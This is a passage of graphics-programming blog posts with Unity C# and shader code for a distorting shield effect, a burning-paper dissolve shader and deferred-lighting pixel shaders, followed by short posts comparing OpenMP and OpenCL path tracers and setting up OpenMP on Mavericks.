This is great and all, but now our shield looks all weird since we’re distorting the UVs that it’s being drawn with too. I’d like to preserve the nice plasma texture on the shield, so I’m going to move the actual rendering of the shield to a different camera, and make sure the camera that we’re distorting the UVs on doesn’t see objects on the shield layer. This is really easy to do, but will leave us with a different problem. We’ll get to that in a second.

First, let’s modify our c# effect script to create this new camera for us:

RenderTexture shieldRT;
RenderTexture screenRT;
Camera distortCam;
Camera mainCam;
Camera shieldCam;

Shader shieldReplacementShader;
Material effectMaterial;

void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,0, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    shieldReplacementShader = Shader.Find("Custom/Replacement");
    effectMaterial = new Material(Shader.Find("Custom/Composite"));

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);
    mainCam.cullingMask &= ~(1 << LayerMask.NameToLayer("Shield"));

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;

    shieldCam = new GameObject("Shield Cam").AddComponent<Camera>();
}

void Update()
{
    shieldCam.cullingMask = distortCam.cullingMask;
    shieldCam.clearFlags = CameraClearFlags.Depth;
    shieldCam.depth = mainCam.depth + 1;
    shieldCam.transform.position = mainCam.transform.position;
    shieldCam.transform.rotation = mainCam.transform.rotation;
    shieldCam.cullingMask = 1 << LayerMask.NameToLayer("Shield");
    shieldCam.fieldOfView = mainCam.fieldOfView;
    shieldCam.orthographic = mainCam.orthographic;
    shieldCam.orthographicSize = mainCam.orthographicSize;
}

void OnPostRender(){...}

Notice that we also added a line to remove the Shield layer from the main camera’s culling mask. Now that we have a second camera doing this for us, that camera doesn’t need to create draw calls to incorrectly render the shield colour.

With this change, our shield looks a lot better, but like I said, this has exacerbated another problem we have. Earlier we accepted that our distortion effect wasn’t going to have depth information, and therefore would distort things in front of the shield, but now, we also don’t have depth information for the shield colour itself, which means that shields will render on top of everything else. This is much more noticeable, and makes this effect really unwieldy, so we’re going to have to do something about that.

From Full Screen Effect to Projective Texturing

Buckle up, things are about to get fun.

All the problems that we have right now are due to us treating the shields like they aren’t geometry: we’re rendering them to a buffer to distort the whole screen, and then using a secondary camera which has no depth information to paste them over the rest of the game. Wouldn’t it be great if we could use our depth buffer to occlude both the distortion and colours of the shield?

In the past, I’ve seen this done by manually calculating a depth pass, but this is expensive and requires you to double the draw calls of everything you want included in the depth buffer that you’re going to use to occlude your warp effect; so instead of doing that, here’s what we’re going to do today:

Render the main camera (without warp) to a render texture
Render the multi colored shield buffer as usual
Copy the main camera render texture to the buffer that the shield camera will draw into
Share a depth buffer between our main camera and our shield camera so that our shields are occluded properly without incurring extra draw calls
Continue to render our shields after everything else, but pass the main camera render texture to our shield shaders, and let them deal with the warp effect themselves so that when the shield is occluded, the warp effect is occluded too
Blit the shield camera render texture to the screen

It’s a lot of changes, but at the end of the day we’re going to end up with a really really easy to use shield bubble effect that behaves exactly like we expect it should without incurring extra draw calls or doing a lot of extra full screen operations. So without further ado, let’s take it from the top!

Rendering the main camera to a render texture

The first part of this list should be pretty easy after all the work with render textures we did above. In fact we’re already rendering the main camera to a render texture (the screenRT) so we’re actually in good shape.

First of all, we need to stop our main camera from blitting to the screen, and we need to set our offscreen buffer to a global shader uniform so we can access it later. We’re going to change the our OnPostRender function in our c# script from this:

void OnPostRender()
{
    ...
    effectMaterial.SetTexture("_DistortionTex", shieldRT);
    Graphics.Blit(screenRT, null, effectMaterial);
}

To this:

void OnPostRender()
{
    ...
    Shader.SetGlobalTexture("_DistortionBuffer", shieldRT);
    Shader.SetGlobalTexture("_ScreenBuffer", screenRT);

    Graphics.Blit(screenRT, finalRT);
}

One important thing to note here is that if you want objects which have warp be be seen through each other, you’re going to have to render them to this buffer. For our shields, the easiest way to do this is to create a duplicate shield sphere, assign it the optimized (non warp) shader, child it to the original shield sphere and make sure it isn’t on the Shield layer. This isn’t going to work in all cases, but it will for our purposes today.

Notice that we’re no longer going to be setting properties of the composite material. This is because with our new approach, the composite material’s logic is going to be handled by the shield shader, so we don’t actually need the composite any more.

You may also have noticed that the code above references a new RenderTexture. About that:

Two New RenderTextures

Step three and four of our new technique hint at some new render textures that we’re going to need. The first of which is our finalRT. This is the render texture that the camera rendering our warp objects will write into. We’ve already got the code to copy our main camera’s output into that texture like we said we’d do, but we also need to set up this render texture. We also need to set up a render texture specifically for storing the depth buffer from the main camera so that we can pass that to our shield camera as well.

Our new Awake function should look like the following:

RenderTexture shieldRT;
RenderTexture screenRT;
RenderTexture finalRT;
RenderTexture depthRT;
Camera distortCam;
Camera mainCam;
Camera shieldCam;

Shader shieldReplacementShader;
Material effectMaterial;

void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    finalRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    finalRT.wrapMode = TextureWrapMode.Repeat;

    depthRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Depth);
    depthRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,16, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    shieldReplacementShader = Shader.Find("Custom/Replacement");

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, depthRT.depthBuffer);
    mainCam.cullingMask &= ~(1 << LayerMask.NameToLayer("Shield"));

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;

    shieldCam = new GameObject("Shield Cam").AddComponent<Camera>();
    shieldCam.SetTargetBuffers(finalRT.colorBuffer, depthRT.depthBuffer);
}
...

Excellent! Now we have to make sure that our shieldCam is set to not clear anything before it renders, since we now are very deliberately populating it’s buffers with data from our main camera:

void Update()
{
...
    shieldCam.clearFlags = CameraClearFlags.Nothing;
...
}

And finally, you may notice that we’re not actually drawing anything to the screen anymore. We need to tell our shieldCam that it’s cool to render everything to the frame buffer when it’s done. I like to keep as much of the logic for an effect within the same script as I can, so I did this by adding a new function to our effect script, and putting a component on the shield camera to call this inside an OnPostRenderCall. You can find a scene with everything set up like this in the code dump at the end of the article.

public void BlitToScreen()
{
    Graphics.Blit(finalRT, (RenderTexture)null);
    screenRT.DiscardContents();
    finalRT.DiscardContents();
    shieldRT.DiscardContents();
}

Notice that we also clear the contents of our render textures in this function.

Warping Inside our Fragment Shaders

There’s one last thing we need to do to finish this effect, and that’s to move the logic that used to live in our composite shader to the shader we use to draw our shields. There’s a completed shader at the end of this article but all we’re doing is adding uniforms to the shader so we can see the screenRT and shieldRT (the warp buffer), and then filling in areas of our object that would be transparent if we were alpha blending with a distorted lookup into screenRT. The addition to the fragment shader looks like this:

fixed4 frag(v2f i) : SV_Target
{
    float3 viewdir = normalize(_WorldSpaceCameraPos - i.worldPos);
    float ang = 1 - (abs(dot(viewdir, normalize(i.normal))));
    half4 rimCol = _RimColor * pow(ang, _RimPower) * _RimIntensity;

    half4 texColor = tex2D(_MainTex, i.texcoord);
    fixed4 tex =  rimCol * texColor;

    float4 screen = ComputeScreenPos(i.objectPos);
    fixed4 distortion = tex2Dproj(_DistortionBuffer, UNITY_PROJ_COORD(screen));

    float4 screenPos = screen;				
    screenPos.xy =  screenPos.xy - (distortion.rb - 0.5) * 1.5;

    float4 d = tex2Dproj(_ScreenBuffer, UNITY_PROJ_COORD(screenPos));
    return  tex + d + texColor * CalcShieldIntensity16(i.oPos);
}

The ComputeScreenPos and UNITY_PROJ_COORD macros do most of the hard work for us here, but you can see where we’ve basically lifted the logic completely from the composite shader and added it here. This is going to make our 100% opaque objects look like they’re alpha blending with a warp effect. It also lets our war effect be occluded by geometry, by other warp effects, and if you took my advice and wrote out a non warp version of shield to the main camera, you can see one shield through another. All of this put together might look something like this:

When you look at the final shader I have posted in the google drive, you’ll also notice that I’ve added a second pass to it so that we can properly show the shield impacts on the side of the shield behind the ship we’re looking at. I skipped over the distortion effect in that pass to make it a bit more performant, but I wanted to keep the shield impacts so that the player could see all the direction that they were being shot at from. Again, this is open to interpretation, as it does make the shader much more expensive.

And At last, that’s everything!

How Expensive Is This

So the inevitable question that’s always (rightly) asked about cool graphics code is “how expensive is it?” So before we wrap up for today, let’s do a quick performance analysis of our new shield versus the original shield posted and figure out exactly what using either of them means for our performance. Since virutally all my Unity experience is on mobile, let’s look at this like our intended target is a mobile device.

On the draw call front, the original shader from Warfleet comes in the lowest, with a single draw call. This is followed by my optimized version of the shader, which I added a draw call to so that we could render the inside/back face of the sphere’s impacts as well. Our post effect version comes in last, with a draw call to render the shield to our buffer, and 1 draw call per side of the shield that we’re rendering.

It’s worth noting that if all you’re looking for is a more performant version of the original effect, you could remove the back face pass in the optimized version and be there.

Finally, I’ve set up a small test scene to see what the on device cost of the effect is. The scene is simple enough, whenever I tap the screen I spawn another instance of the shield and offset it a bit from the first one. I’ve turned on the on board profiler on an iPhone 6 to grab the performance data over time. It’s not a perfect test, but the test scene is consistent across every shader so at least the numbers will be useful. Here are the results:

Remember that these results are on a metal capable device (which means the cost of a draw call is lower than you’d see on OpenGL), these numbers are only useful relative to each other, and not as an absolute measure of the cost of these shaders on any device except the iPhone 6.

Conclusion

That should do it, as said above, the source for everything here can be found on google drive here. Hopefully this has been helpful enough that you don’t feel limited to just making sci fi shields, but feel like you can go forth and create refraction shaders, heat haze, whatever!

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter.

Happy shading!

A Burning Paper Shader

2015-11-10T00:00:00+00:00

After a long hiatus, I’ve decided to start posting again! And I can think of no better way to kick that off than with revisiting a cheesy old shader that I posted 2 years ago.

So today we’re revisitng the “Dissolve” shader effect. I’ve seen this effect pop up more and more lately, mostly on 2D elements ( like in Hearthstone and Armello ), so today we’re going to see what we can get working on a plane, and then torch an unsuspecting 3D fence.

Ok, enough intro! Let’s take a look at what we’re building:

Breaking things down

To start, let’s get the core part of the effect down: dissolving a mesh based on a texture. This is the easiest part to get right, since there really isn’t any need for artistic interpretation. You probably noticed that the above gif starts dissolving from one point and works it’s way across the quad.We’ll get to that, but lets dissolve the entire quad uniformly first. Like so:

All we need to achieve this is a texture to use as our dissolve control texture. This can be anything (and in some cases using the diffuse texture of the object yields really cool results), but for the most general purpose control texture, use a smoothed noise texture. You can google around for these, or create your own. One thing you’re going to want to look for is one with a reasonably good contrast, which is going to give you a really nice range for your dissolve effect.

Before we write any code, let’s get our math sorted out first. We want to expose a constant value which controls the dissolve effect (0 for completely dissolved, 1 for totally not dissolved), which I’m going to refer to as _DissolveValue for the rest of the post. Then we need to look up the colour value in the control texture for the fragment we’re currently shading and add that value to _DissolveValue. This gets us the following:

Before the effect starts (_DissolveValue == 1), at pure black in the noise texture, our sum will be 1
When the effect ends (_DissolveValue == 0), at pure white in our noise texture, our sum will be 1

Since we want to make sure that at the end, every pixel is transparent, we need to clamp our noise value to a maximum of 0.99, which will allow us to make the blanket statement that we can set any pixel who’s sum is < 1 to transparent.

As a fragment function, the above logic might look like this:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;
   mainTex.a *= floor(_DissolveVal + min(0.99,noiseVal.r));
   return mainTex;
}

For brevity’s sake I’m going to omit posting the whole shader source as we work through it, but the full source is at the bottom of this article so if you’re stuck just jump down there and fill in any blanks.

The Edge Details

Ok, so we have our basic effect now, but it doesn’t really look like anything other than a janky shader effect, and I’ve found that in general “janky shader” isn’t high up on the things commonly asked for by artists. Let’s add some colour to the edges of the dissolve effect.

To do this, we’re going to use a gradient to control the colours of the edge, and we’ll use the alpha channel of that gradient to control our fragment’s alpha as the effect progresses. The leftmost pixel in the gradient will be our fully dissolved value, with an alpha of 0, while the rightmost pixel will be a completely untouched pixel with alpha of 1 and a colour value of white. What you put in between these two values is up to you, but for the effect I’m building, my gradient looks like this:

Instead of multiplying our alpha as we did before, this time we’re going to multiply the entire colour value of our pixel by a point in our gradient. As before, we want to make sure that a _DissolveValue of 1 is a fully untouched mesh, and when it’s 0, we have a fully transparent mesh. This changes our requirements for our math a little bit since we can’t just floor the sum and get a hard line between 1 and <1. We need to make sure that when _DissolveValue is 1, we are at an X value of 1, regardless of our noise texture, but we still want to make sure that at a _DissolveValue of 0 that we’re at an X value of 0 regardless of the value in our noise texture.

This might sound tricky, but it isn’t as long as you set the wrap mode of your gradient to “clamp,” so that we can get values outside the range of 0 and 1.Provided that’s set up correctly, the following will work just fine:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed d = (2.0 * _DissolveValue + noiseVal) - 1.0;
   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2( overOne, 0.5));
   return mainTex * burn;
}

The _GradientAdjust parameter isn’t necessary to make the effect work, but it provides a great deal of control over how tight you want the edges of your effect to be (just make sure that its value is greater than 1). I found that with the gradient I was using, setting that parameter to 2 produced reasonably good results, which looked like this:

Notice that in the gif above, nothing really happens until we hit about _DissolveValue 0.5. This is dependent on the range of your noise texture, a higher contrast texture will show dissolve effects starting earlier and ending later.

Making This Useful

What we have right now looks pretty good, but it isn’t very useful. I think it’s safe to say that in almost every situation where this effect would look good, it would look way better if the effect came from one direction, or for our purposes today, started at a specific point.

Since we want the dissolve effect to radiate out from a point, what we need to do is define a function which will:

Return 1 when _DissolveValue is 1
Return 0 when dissolveValue is 0
Returns a value between 0 and 1 which approaches 0 and the distance to our origin point decreases

Let’s start from the obvious place and just add the distance to our previous calculation:

GradientXCoord = ((2.0 * _DissolveValue + NoiseTextureValue) * DistanceToPoint) - 1.0

This is as good a place to start as any, but we’re no longer guaranteed to return 1 when _DissolveVal is 1, and if the distance is > 1, the effect gets way less predictable.

The distance problem is probably what you’ll care about more at first, since it makes the _DissolveValue almost useless unless either your distance to the hit point is exceedingly small, or your _DissolveValue is exceedingly small. What we really want is for our distance value to have a range of 0 to 1 as well, which means we need a value to scale our distance by.

Through experimenting a bit, I’ve found that I get pretty good results with the largest distance between any 2 point on the mesh (in object space) divided by 2. As long as your origin point is on your mesh, just divide the distance from each fragment to the origin point by the max distance we’ve calculated to get a much nicer (although not stringly 0.0 - 1.0 in all cases) value.

You can calulate this scaling value with something like this attached to the object you want to use this shader with:

void Start()
{
   float maxVal = 0.0f;
   Material dissolveMaterial = GetComponent<Renderer>().material;
   var verts = GetComponent<MeshFilter>().mesh.vertices;
   for (int i = 0; i < verts.Length; i++)
   {
      var v1 = verts[i];
      for (int j = 0; j < verts.Length; j++)
      {
         if (j == i) continue;
         var v2 = verts[j];
         float mag = (v1-v2).magnitude;
         if ( mag > maxVal ) maxVal = mag;
      }
   }
   dissolveMaterial.SetFloat("_LargestVal", maxVal * 0.5f);
}

Using this value, we can modify our fragment function to look like so:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed toPoint =  (length(i.oPos.xyz - i.hitPos.xyz) / _LargestVal);
   fixed d = ( (2.0 * _DissolveValue + noiseVal) * toPoint ) - 1.0;

   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2(overOne, 0.5));
   return mainTex * burn;
}

This actually is pretty close to our end product, but now we have a new problem: by scaling our distance like this, we no longer can guarantee that we have a fully opaque mesh at _DissolveValue 1. What we need to do is make our divisor smaller for higher values of _DissolveValue, which can be done like so:

fixed4 frag(vOUT i) : COLOR
{
   fixed4 mainTex = tex2D(_MainTex, i.uv);
   fixed noiseVal = tex2D(_NoiseTex, i.uv).r;

   fixed toPoint =  (length(i.oPos.xyz - i.hitPos.xyz) / ((1.0001 - _DissolveValue) * _LargestVal));
   fixed d = ( (_DissolveValue + noiseVal) * toPoint ) - 1.0;

   fixed overOne = saturate(d * _GradientAdjust);

   fixed4 burn = tex2D(_BurnGradient, float2( overOne, 0.5));
   return mainTex * burn;
}

Make sure that whatever number you subtract _DissolveValue from when you do this is greater than the max value that you can set _DissolveValue to, otherwise you risk dividing by 0 at some point in your effect, which can cause all kinds of problems.

With the above fragment function, you now have a perfectly good shader, but I made one additional artistic modification: I multiplied my final toPoint variable by the noise value before calculating d. This helped me avoid having a perfectly circular hole at high values of the _DissolveValue. It’s not necessary, but I think it looks a lot better.

Using the above script / shader, when I applied this shader to an object, the effect I got looked like this:

Practical Implementation Details

Although we have our shader now, we aren’t done. As with a lot of effects, this one is best when it’s driven by some addition cpu side logic. For one, where are we getting our hit point from? Wouldn’t it be awesome if we could drive that by a mouse click and start burning our paper / fence / whatever at whatever point we wanted?

To do that, let’s expand the script we used to set the max value and give it some additional logic. We also will need to modify our above start function to use the variable _dissolveMaterial instead of the one we used before, which was scoped locally to our start function. I’m going to leave that out here, but the full source is available at the end.

private float _value = 1.0f;
private bool _isRunning = false;
private Material _dissolveMaterial = null;
public float timeScale = 1.0f;

public void Reset()
{
   _value = 1.0f;
   _dissolveMaterial.SetFloat("_DissolveValue", _value);
}

public void TriggerDissolve(Vector3 hitPoint)
{
   _value = 1.0f;
   _dissolveMaterial.SetVector("_HitPos", (new Vector4(hitPoint.x, hitPoint.y, hitPoint.z, 1.0f)));
   _isRunning = true;
}

void Update()
{
   if (_isRunning)
   {
      _value = Mathf.Max(0.0f, _value - Time.deltaTime*timeScale);
      _dissolveMaterial.SetFloat("_DissolveValue", _value);
   }
}

With this, assuming that our shader is going to handle transforming the hit point into object space, all we need now is to cast a ray from the point on the screen where our mouse clicks and pass the hitpoint on our object’s collider to this script.

I’m going to handle this in a different script, so that we can put our dissolve script on multiple objects, but only cast 1 ray for all of them:

public class TriggerDissolveOnClick : MonoBehaviour
{
   Vector3 point;
   bool didHit = false;
   DissolveEffect targetEffect;
   void Update ()
   {
      if (Input.GetMouseButton(0))
      {
         RaycastHit hitInfo;
         if (Physics.Raycast(Camera.main.ScreenPointToRay(Input.mousePosition),out hitInfo))
         {
            targetEffect = hitInfo.collider.gameObject.GetComponent<DissolveEffect>();
            if (targetEffect != null)
            {
               didHit = true;
               point = hitInfo.point;
               targetEffect.Reset();
            }
         }
      }
      if (didHit && Input.GetMouseButtonUp(0))
      {
         targetEffect.TriggerDissolve(point);
      }
   }
}

I attached the above script to my main camera (although it isn’t required as long as it’s somewhere in your scene). Once that’s all set up, you can put the DissolveEffect script on any object which uses our dissolve shader, and 1 click will give the the Marvin the Martian treatment:

Something to note: if your UVs aren’t set up to handle a seamless texture, you’re going to have a bad time. In cases where the actual texturing of the object requires UVs to be defined with discontinuities (so…pretty much all cases), you’re going to need to find another way to look up your noise texture. Since Unity 5 gives us access to 2 additional UV channels, I recommend trying UV3 or UV4, which will leave your UV2 channel available for lightmapping :)

The source for everything here (scripts and shaders) can be found on google drive here

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter. Finally I’d like to say thanks to everyone who has emailed me corrections to previous posts, or in some cases code to keep things up to date with new versions of things. I’ll be updating those posts with everything that’s been sent in soon.

Happy shading!

Using Pixel Shaders with Deferred Lighting in Unity 4

2015-01-03T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2015) and may not run / be useful for the latest version of unity

In a previous post (link), I talked about why surface shaders are a great way to write shaders for Unity’s Deferred Lighting rendering path, and they are.

But given the choice, I’d rather write pixel shaders. Surface shaders always felt a little too much like magic for me, and I’ll trade writing more lines of code for more control over what my gpu is doing any day of the week.

For forward rendering, writing pixel shaders is virtually no different from writing shaders for any other engine, however not much information is out there about writing pixel shaders that work with Unity’s deferred lighting system (and more maddeningly, there is no information in Unity’s docs), so this post is going to talk about that.

The shader we'll build in this article

Note that this article will not cover how to write custom lighting models for deferred lighting, but rather how to write shaders which use whatever lighting calculations are generated by the deferred lighting system.

I’m also on a mac, and the shader compiler for opengl is way less picky than for directX, so if you hit any snags on windows, send me a message on twitter and we’ll get things sorted out.

The Deferred Lighting Process

If you’re unfamiliar with what Deferred Lighting is, I recommend checking out my earlier post (link), where I go over the differences between deferred and forward rendering. As a quick refresher, Unity’s Deferred lighting system in a 3 step process:

Step 1: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).

Step 2: the previously built buffers are combined to compute the lighting for each pixel on the screen.

Step 3: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).

When you write surface shaders, you don’t really need to worry about the nuts and bolts of this process, but since we’re using pixel shaders we’re directly responsible for the first and last steps. As such all pixel shaders that work with Deferred Lighting are 2 pass shaders (3 pass if you want to cast shadows).

Our Setup:

We’ll start building our shader with an empty pixel shader skeleton:

Shader "Specular-Deferred"
{
Properties {
	_MainTex ("Base (RGB)", 2D) = "white"{}
	_SpecColor ("Specular Color", Color) = (0.5,0.5,0.5,1)
 	_Shininess ("Shininess", Range(0.01,1)) = 0.078125
}
SubShader{
	Pass{
	}
	Pass{
	}
	Pass{
	}
}
}

Since we want our object to properly cast shadows, we need to write three passes. Note that if you only need your object to receive shadows, you can omit the third pass, since the shadow attenuation will already be factored into the light buffer that Unity builds as during Step 2.

Pass 1: Getting Data Into the G Buffer

The first thing we need to do is make sure that the G-Buffer knows about our object’s shape and specularity so that it can properly calculate lighting for the scene. To do this, we need a pass that outputs the normals and specular values for our object.

To start, we need to let Unity know which pass to use to get this information. Just like with forward rendering, we’re going to use the LightMode tag to assign our passes different roles. In this case, we’ll use “PrePassBase.”

A lot of this pass is very straightforward, since for the most part all we’re doing is outputting normals, but since we also want our objects to be shiny, we need to set the alpha of our fragment shader’s output to our object’s shininess, like so:

Pass{
	Tags {"LightMode" = "PrePassBase"}
	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag		
	uniform float _Shininess;

	struct vIN
	{
		float4 vertex : POSITION;
		float3 normal : NORMAL;
	};
	struct vOUT
	{
		float4 pos : SV_POSITION;
		float3 wNorm : TEXCOORD0;
	};
	vOUT vert(vIN v)
	{
		vOUT o;
		o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
		o.wNorm = mul((float3x3)_Object2World, v.normal);
		return o;
	}

	float4 frag(vOUT i) : COLOR
	{
		float3 norm = (i.wNorm * 0.5) + 0.5;
		return float4(norm, _Shininess);
	}
	ENDCG
}

If you’re a bit confused as to why this pass is necessary, think of Deferred Lighting as though it’s a shader replacement technique. In order to build the GBuffer, the camera renders all the objects in the scene using the PrePassBase pass, and saves this to a render texture. It then uses this data as part of the process of building the lighting buffer.

The line in the fragment function which halves the normal and then adds 0.5 to it just takes each component in the normal and re maps it from the range -1 to +1, to the range 0 to 1 so that it can be stored in a texture.

Pass 2: Getting Data Out of the Light Buffer

Once that lighting buffer is created, our job changes from putting data into it, to getting data out of it.

Just like forward rendering, our second pass uses a different tag, PrePassFinal, to let Unity know to use this pass for the last step of the deferred rendering process. Otherwise, the first few lines of this pass are unremarkable.

Pass{
	Tags{"LightMode" = "PrePassFinal"}
	ZWrite off
	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag

	sampler2D _MainTex;
	uniform float4 _SpecColor;
	uniform sampler2D _LightBuffer;

	struct vIN
	{
		float4 vertex : POSITION;
		float2 texcoord : TEXCOORD0;
	};

	struct vOUT
	{
		float4 pos : SV_POSITION;
		float2 uv : TEXCOORD0;
		float4 uvProj : TEXCOORD1;
	};
}

The vert function is where things start getting interesting. The fragment function will sample the Light buffer using tex2Dproj, which takes a 4 component vector and divides the xy components by the w component.

Since what we need to do is sample the light buffer at the exact point on the screen that our fragment will be drawn, we have to set our 4 component uv vector to our fragment’s position in clip space. This will let tex2Dproj perform the perspective divide for us, letting us get at exactly the point on the light buffer that we need.

Or rather, that’s the easy way of looking at it. In truth it’s a bit messier than that. Let’s look at what our vertex function ends up being:

vOUT vert(vIN v)
{
	vOUT o;
	o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
	
	float4 posHalf = o.pos * 0.5;
	posHalf.y *= _ProjectionParams.x;
	
	o.uvProj.xy = posHalf.xy + float2(posHalf.w, posHalf.w);
	o.uvProj.zw = o.pos.zw;
	o.uv = v.texcoord;
	
	return o;
}

To start with, we’re halving the clip space coordinates for our projected uvs. I’m assuming this is because the light buffer isn’t actually a screen size texture, but since theres no information available about how Unity’s implementation works under the hood, it’s hard to know for sure.

You could try setting up a deferred lighting scene on an ios device and using Xcode’s gpu capture frame to get at that data, but I don’t have any ios devices in my apartment so I’ll leave that to you (send me a message on twitter if you actually try this :D ).

The Unity docs have this to say about _ProjectionParams:

“x is 1.0 (or –1.0 if currently rendering with a flipped projection matrix), y is the camera’s near plane, z is the camera’s far plane and w is 1/FarPlane.”

So it looks like all that multiplication is doing is making sure that we’re right side up on platforms where rendering to texture flips the image.

I have no idea why we end up adding the halved w component back to our xy components. Again, twitter me if you have any idea.

But now that that’s covered, our fragment function is really straightforward:

float4 frag(vOUT i) : COLOR
{
	float4 light = tex2Dproj(_LightBuffer, i.uvProj);
	float4 logLight = -(log2(max(light, float4(0.001,0.001,0.001,0.001))));
	float4 texCol = tex2D(_MainTex, i.uv);
	return float4((texCol.xyz * light.xyz) + float3(_SpecColor.xyz) * light.w, texCol.w);
}

Notice how unlike forward rendering, we don’t have to do any per light calculations, because they’ve already been done for us, and had the resulting value stored in the light buffer. All we have to do is read from that buffer and multiply our fragment colour accordingly. Just like in the first pass, specular values are stored on the alpha channel of the light buffer.

The logTex calculation feels to me like an implementation specific detail that we don’t really need to worry about, except to know that we have to do it to get values that make sense from Unity. I haven’t built any deferred lighting systems from scratch, so I’m not sure if this is a standard way of storing data in a light buffer or not.

But nevertheless, you should now have a working pixel shader with deferred lighting. How exciting! Only one pass left to go.

Pass 3: Casting Shadows

One of the cooler parts of Deferred Rendering is getting to have point lights cast shadows, but to do that we’ll need another pass. Luckily, this pass is the same as any other shadow caster pass in Unity. In theory could let a fallback handle this for you, but for the sake of having a fully standalone shader, let’s add it here as well.

Pass {
	Name "ShadowCaster"
	Tags { "LightMode" = "ShadowCaster" }
	
	Fog {Mode Off}
	ZWrite On ZTest LEqual Cull Off
	Offset 1, 1

	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag
	#pragma multi_compile_shadowcaster
	#include "UnityCG.cginc"

	struct v2f { 
		V2F_SHADOW_CASTER;
	};

	v2f vert( appdata_base v )
	{
		v2f o;
		TRANSFER_SHADOW_CASTER(o)
		return o;
	}

	float4 frag( v2f i ) : SV_Target
	{
		SHADOW_CASTER_FRAGMENT(i)
	}
	ENDCG
}

Conclusion

If everything has gone according to plan, you should now have a pixel shader that works with deferred lighting and shadows! If you don’t see your object at all, make sure that you’ve actually switched your camera over to the deferred path (I made that mistake when writing this post).

It’s worth noting that all I did to figure this out was to write surface shaders that only used the deferred lighting path, have them compile down to glsl and figure out what was going on from the compiled shaders.

If you want to learn more (like how to add spherical harmonic lights, or use lightmaps), all you need to do in order to do this yourself is add “exclude_path:forward” to your surface pragma, and add an additional pragma below that, like this:

#pragma surface surf BlinnPhong exclude_path:forward
#pragma only_renderers gles

If you’re on desktop, you’ll need to click the “Show All” button in the inspector to get at the gles code, since gles shaders are meant for mobile devices. If you can read ARB or DirectX assembly, you can do that too, but I find glsl much more readable.

notice the "Show All" button

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter. Happy Shading!

OpenMP vs OpenCL - An Unfair Comparison

2014-10-25T00:00:00+00:00

In the wake of my last post, I decided to get started with my path tracing project by building a small proof of concept renderer to get my feet wet both with the path tracing algorithm and with OpenMP. I was pretty happy with the output of the path tracer (shown below), but I wasn’t happy with the speed I was getting. Since this project’s entire goal is to entertain me, having to wait minutes to see how a code change impacts the output image is a major buzzkill.

So I decided to ask (myself) a really stupid question: would this be faster on the GPU?

And because the answer for that was pretty obvious (yes!), I then asked a slightly less stupid question: how much faster?

To answer that, I wrote a second version of the path tracer using OpenCL and ran both of them with the time command. It goes without saying that the code bases were so different that this comparison isn’t exactly fair, but I’ve always wanted to put a graph in a blog post, so here one is!

It’s hard to see on the graph, but the OpenCL renderer only barely cracked a minute in running time on the 1024 samples per pixel run. OpenMP started at a minute and a half for the 64 samples per pixel case. There are obviously other things that impact which API will be the best for your use case, but iteration speed is pretty important to me, and it’s how I’m deciding which API I’m using for this project. Waiting makes you a waiter.

If you’re interested, the code for both path tracers can be found on github: OpenMP or OpenCL. If you can see anything in the OpenMP source that could be changed to make it 20x faster (which would almost catch up to OpenCL), please let me know! Until then, it looks like I’m abandoning OpenMP for this project.

As always, I’m on twitter if you want to say hi :D Happy Coding!

Setting Up OpenMP on Mavericks

2014-07-15T00:00:00+00:00

NOTE: This article is from 2014 and will not be updated. It may or may not still be valid

If you’ve ever worked with me (or talked with me for more than a half hour) it’s not a secret that I’m completely fascinated with ray and path tracers. My last project was building a relatively simple ray tracer, so I think it’s time to build a path tracer.

The Blender monkey rendered in my first ray tracer

I’ve tinkered with a few open source path tracers out there, but the one that caught my eye originally was SmallPT, which uses OpenMP. OpenMP is an API built by Intel that makes it dead simple to write parallel code. Want to have a for loop distribute itself over multiple cores? That looks like this:

#pragma omp parallel for
for (int i = 0; i < 100; i++)
{
	printf("Loop executed on thread %d",  omp_get_thread_num());
}

After working with Boost’s Thread library on the ray tracer, which ended up dictating a lot of the structure of the renderer, OpenMP seems like a great way to let the compiler/runtime handle the implementation of the threading code and let me focus on actually building something cool.

